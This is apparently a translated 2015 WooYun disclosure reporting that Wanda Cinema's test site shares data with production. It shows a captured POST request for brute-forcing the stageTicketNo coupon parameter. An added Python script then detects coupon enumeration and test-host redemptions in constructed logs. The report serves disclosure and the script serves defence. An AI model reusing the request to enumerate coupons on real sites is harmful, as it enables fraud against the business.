
A Wanda Cinema test interface not isolated from production allows brute-forcing movie exchange coupons

2015-05-25 16:55

http://wwwdemo.wandafilm.com (Wanda test main site)



As already noted in the earlier case (http://wooyun.org/bugs/wooyun-2015-0106596), the data on this test site is synchronized with production. The root cause is therefore that the test site and the production site are not isolated, which turns an issue on the test site into a vulnerability against production.



The problem appears in step three of the ticket purchase flow, where a movie ticket exchange coupon or discount can be applied.



[Screenshot: 1.png]





At this point, capture the request and brute-force the stageTicketNo (exchange coupon) parameter.



Code:
POST http://wwwdemo.wandafilm.com/trade/coupons.do?m=useExachangeStage&sid=0.14484114106744528 HTTP/1.1
Host: wwwdemo.wandafilm.com
Proxy-Connection: keep-alive
Content-Length: 109
Accept: */*
Origin: http://wwwdemo.wandafilm.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://wwwdemo.wandafilm.com/trade/step3.do?m=buyPay&snid=20150409141110216411&spk=20150408112111862006&sid=0.27838509250432253
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: wandafilm2015-04-09=/wandafilmappHd18651669495/http%3A%2F%2Fwwwdemo.wandafilm.com%2Ftrade%2Fmovie_times.jsp%3FfilmId%3D2015011302182029265318651669495/http%3A%2F%2Fwwwdemo.wandafilm.com%2Ftrade%2Fstep2.do%3Fm%3DmovieBuy%26spk%3D20150408112111862006%26avtId%3D%26price%3D6018651669495/http%3A%2F%2Fwwwdemo.wandafilm.com%2Ftrade%2Fstep3.do%3Fm%3DbuyPay%26snid%3D20150409141110216411%26spk%3D2015040811211186200618651669495; jsessionid|JSESSIONID=******1ba76ad7ef*****; __utma=8139.1428050786.1428050786.1428550560.2; __utmc=81395784; __utmz=81395784.1428050786.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=********92A30CAA0; wandafilm2015-04-09=/wandafilmappHd18651669495; Hm_lvt_12e233684b48dc67054644eaa9e278fc=1428372551,1428456490,1428477542,1428548995; Hm_lpvt_12e233684b48dc67054644eaa9e278fc=1428559876

stageTicketNo=103575197********&orderId=20150409141110216411&orderDetailId=20150409141110220411&seatId=8_16





[Screenshot: 2.png]





The response value indicates whether a given coupon number can be used.



[Screenshot: 3.png]





Exchange successful.



[Screenshot: 4.png]

Proof of vulnerability:

Proven above.

Fix recommendation:

Isolate test and production system data.
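The report's two findings are (1) a coupon-redemption endpoint whose response distinguishes valid from invalid stageTicketNo values, so a session can try many numbers until one works, and (2) a test host that redeems real production coupons. The following is an added example written for this page, not code from the report or from Wanda; it assumes a hypothetical application audit log in which each call to coupons.do?m=useExachangeStage writes one line with the host, session, order, coupon tried and outcome, and the log lines below are constructed. It flags sessions that fail many distinct coupon numbers inside a short window (enumeration) and any successful redemption that went through the test host (the isolation failure the fix recommendation addresses).

```python
"""Detect coupon enumeration and test-host redemptions from an audit log.

Added example, not part of the original WooYun report. The audit log
format (one line per redemption attempt) is an assumption for this example.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

# Constructed sample audit lines: s1 walks through six distinct coupon
# numbers in 75 seconds on the test host and then succeeds; s2 is a normal
# user who mistypes once on production; s3 has three failures hours apart.
SAMPLE_LOG = """\
2015-04-09T09:00:00 host=www.wandafilm.com sid=s3 orderId=20150409090000000003 stageTicketNo=103575197300001 result=INVALID
2015-04-09T11:00:00 host=www.wandafilm.com sid=s3 orderId=20150409090000000003 stageTicketNo=103575197300002 result=INVALID
2015-04-09T13:00:00 host=www.wandafilm.com sid=s3 orderId=20150409090000000003 stageTicketNo=103575197300003 result=INVALID
2015-04-09T14:11:10 host=wwwdemo.wandafilm.com sid=s1 orderId=20150409141110216411 stageTicketNo=103575197100001 result=INVALID
2015-04-09T14:11:25 host=wwwdemo.wandafilm.com sid=s1 orderId=20150409141110216411 stageTicketNo=103575197100002 result=INVALID
2015-04-09T14:11:40 host=wwwdemo.wandafilm.com sid=s1 orderId=20150409141110216411 stageTicketNo=103575197100003 result=INVALID
2015-04-09T14:11:55 host=wwwdemo.wandafilm.com sid=s1 orderId=20150409141110216411 stageTicketNo=103575197100004 result=INVALID
2015-04-09T14:12:10 host=wwwdemo.wandafilm.com sid=s1 orderId=20150409141110216411 stageTicketNo=103575197100005 result=INVALID
2015-04-09T14:12:25 host=wwwdemo.wandafilm.com sid=s1 orderId=20150409141110216411 stageTicketNo=103575197100006 result=INVALID
2015-04-09T14:12:40 host=wwwdemo.wandafilm.com sid=s1 orderId=20150409141110216411 stageTicketNo=103575197100007 result=SUCCESS
2015-04-09T14:20:00 host=www.wandafilm.com sid=s2 orderId=20150409142000000002 stageTicketNo=103575197200001 result=INVALID
2015-04-09T14:20:30 host=www.wandafilm.com sid=s2 orderId=20150409142000000002 stageTicketNo=103575197200002 result=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) sid=(?P<sid>\S+) orderId=(?P<order>\S+) "
    r"stageTicketNo=(?P<coupon>\S+) result=(?P<result>\S+)$"
)


def parse_line(line):
    """Parse one audit line into a dict, or None for unrelated/malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def parse_log(text):
    """Parse all lines and return the records ordered by timestamp."""
    records = [r for r in (parse_line(l) for l in text.splitlines()) if r]
    return sorted(records, key=lambda r: r["ts"])


def find_enumeration(text, max_failures=5, window=timedelta(minutes=5)):
    """Return {sid: n} for sessions that failed on at least `max_failures`
    distinct coupon numbers within any sliding `window`; n is the peak count."""
    recent = defaultdict(deque)  # sid -> deque of (ts, coupon) failed attempts
    flagged = {}
    for rec in parse_log(text):
        if rec["result"] == "SUCCESS":
            continue
        q = recent[rec["sid"]]
        q.append((rec["ts"], rec["coupon"]))
        # Drop failures older than the window before counting.
        while q and q[0][0] < rec["ts"] - window:
            q.popleft()
        distinct = len({coupon for _, coupon in q})
        if distinct >= max_failures:
            flagged[rec["sid"]] = max(distinct, flagged.get(rec["sid"], 0))
    return flagged


def find_test_host_redemptions(text, test_hosts=("wwwdemo.wandafilm.com",)):
    """Return sorted sids that successfully redeemed a coupon via a test host.
    Any hit means test and production coupon data are not isolated."""
    return sorted({r["sid"] for r in parse_log(text)
                   if r["result"] == "SUCCESS" and r["host"] in test_hosts})


if __name__ == "__main__":
    print("enumeration suspects:", find_enumeration(SAMPLE_LOG))
    print("redeemed via test host:", find_test_host_redemptions(SAMPLE_LOG))
```

Counting distinct coupon numbers rather than raw requests keeps a user who retries the same mistyped code from being flagged, and the sliding window lets s3's widely spaced failures pass while s1's burst trips the threshold. In practice the same two signals belong on the server side as well: a per-session limit on failed redemptions, and a hard refusal to load production coupon records on any non-production host.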

Source: www.wooyun.org/bugs/wooyun-2015-0106823
